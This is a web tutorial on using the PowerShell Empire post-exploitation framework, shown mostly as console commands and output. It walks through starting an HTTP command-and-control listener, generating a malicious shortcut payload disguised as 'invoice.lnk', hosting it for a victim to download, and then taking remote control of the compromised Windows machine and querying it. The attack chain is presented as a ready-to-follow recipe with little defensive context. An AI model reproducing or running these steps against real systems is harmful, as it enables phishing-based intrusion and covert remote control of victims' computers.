Articles How To Use Powershell Empire

How To Use Powershell Empire

-

Initial setup

Build a C2 server called listener

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       285 modules currently loaded

       0 listeners currently active

       0 agents currently active


(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
http          http_com      http_foreign  http_hop      http_mapi
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info

    Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  SlackToken        False                                        Your SlackBot API token to communicate with your Slack instance.
  ProxyCreds        False       default                          Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        http                             Name for the listener.
  Launcher          True        powershell -noP -sta -w 1 -enc   Launcher string.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  SlackChannel      False       #general                         The Slack channel or DM that notifications will be sent to.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  Host              True        http://192.168.164.154:80        Hostname/IP for staging.
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  Proxy             False       default                          Proxy to use for request (default, none, or other).
  UserAgent         False       default                          User-agent string to use for the staging request (default, none, or other).
  StagingKey        True        x,v|hOzsE1+7r.<5YwpjgT2R[6B0inmd Staging key for initial agent negotiation.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  Port              True        80                               Port for the listener.
  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.
  StagerURI         False                                        URI for the stager. Must use /download/. Example: /download/stager.php


(Empire: listeners/http) > set BindIP 192.168.164.154
(Empire: listeners/http) > execute
[*] Starting listener 'http'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!

Creating a callback program

Create a callback program called stager

(Empire) > usestager
multi/bash                osx/applescript           osx/launcher              osx/teensy                windows/ducky             windows/launcher_vbs      windows/teensy
multi/launcher            osx/application           osx/macho                 windows/backdoorLnkMacro  windows/hta               windows/launcher_xml
multi/macro               osx/ducky                 osx/macro                 windows/bunny             windows/launcher_bat      windows/macro
multi/pyinstaller         osx/dylib                 osx/pkg                   windows/csharp_exe        windows/launcher_lnk      windows/macroless_msword
multi/war                 osx/jar                   osx/safari_launcher       windows/dll               windows/launcher_sct      windows/shellcode
(Empire) > usestager windows/launcher_lnk
(Empire: stager/windows/launcher_lnk) > info

Name: LNKLauncher

Description:
  Create a .LNK file that launches the Empire
  stager.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True                          Listener to generate stager for.
  OutFile          True        clickme.lnk       File to output LNK to.
  LNKComment       False                         LNK Comment.
  Base64           True        True              Switch. Base64 encode the output.
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Icon             False       C:\program files\windows nt\accessories\wordpad.exePath to LNK icon.
  PowershellPath   True        C:\windows\system32\WindowsPowershell\v1.0\powershell.exePath to powershell.exe
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.


(Empire: stager/windows/launcher_lnk) > set Listener http
(Empire: stager/windows/launcher_lnk) > set OutFile invoice.lnk
(Empire: stager/windows/launcher_lnk) > execute

[*] Stager output written out to: invoice.lnk

Program distribution

This time, build a simple web server, download it, and let the target execute stager.

[email protected]:/opt/Empire# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
192.168.164.144 - - [21/Apr/2019 11:40:05] "GET / HTTP/1.1" 200 -
192.168.164.144 - - [21/Apr/2019 11:40:07] "GET /invoice.lnk HTTP/1.1" 200 -

Remote operation

If the callback occurs safely and you can connect to the C2 server, operate it remotely

(Empire: stager/windows/launcher_lnk) > [*] Sending POWERSHELL stager (stage 1) to 192.168.164.144
[*] New agent K2FYZV6W checked in
[+] Initial agent K2FYZV6W from 192.168.164.144 now active (Slack)
[*] Sending agent (stage 2) to K2FYZV6W at 192.168.164.144

(Empire: stager/windows/launcher_lnk) > back
(Empire) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 K2FYZV6W ps 192.168.164.144 DESKTOP-1SS146L   DESKTOP-1SS146L\marseil powershell         592    5/0.0    2019-04-21 11:41:45

(Empire: agents) > rename K2FYZV6W target01
(Empire: agents) > list

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 target01 ps 192.168.164.144 DESKTOP-1SS146L   DESKTOP-1SS146L\marseil powershell         592    5/0.0    2019-04-21 11:42:10

 (Empire: agents) > interact target01
(Empire: target01) > sysinfo
[*] Tasked K2FYZV6W to run TASK_SYSINFO
[*] Agent K2FYZV6W tasked with task ID 1
(Empire: target01) > sysinfo: 0|http://192.168.164.154:80|DESKTOP-1SS146L|marseille|DESKTOP-1SS146L|192.168.164.144|Microsoft Windows 10 Pro|False|powershell|592|powershell|5
[*] Agent K2FYZV6W returned results.
Listener:         http://192.168.164.154:80
Internal IP:    192.168.164.144
Username:         DESKTOP-1SS146L\marseille
Hostname:       DESKTOP-1SS146L
OS: Microsoft Windows 10 Pro
High Integrity:   0
Process Name:     powershell
Process ID:       592
Language:         powershell
Language Version: 5

[*] Valid results returned by 192.168.164.144

(Empire: target01) > hostname
[*] Tasked K2FYZV6W to run TASK_SHELL
[*] Agent K2FYZV6W tasked with task ID 2
(Empire: target01) > [*] Agent K2FYZV6W returned results.
HostName        Aliases AddressList
--------        ------- -----------
DESKTOP-1SS146L {}      {192.168.164.144}
[*] Valid results returned by 192.168.164.144

Must read

28 dangerous extensions detected for Google Chrome and Microsoft Edge

Avast experts have discovered malware hidden in at least 28 third-party...

Why Is It Important To Have Intrusion Detection And Prevention ?

This article describes why detection and prevention of burglaries...

The risk is real: attacks on OT infrastructure

Previously, many believed that attacks on an isolated OT...

Gitpaste-12: Linux bot armed with a dozen exploits

Researchers at Juniper Networks have discovered a Linux scripting...

Saferwall : Open Source Malware Analysis

Saferwall is an open source malware analysis platform. It...

Network Vulnerability Assessment ? Why Should Every Company Do it at least once a Year !

Network vulnerability assessment analyzes a variety of network issues,...

Artificial Intelligence and Cyber Security

As artificial intelligence intrudes into the world of cybersecurity,...

You might also likeRELATED
Recommended to you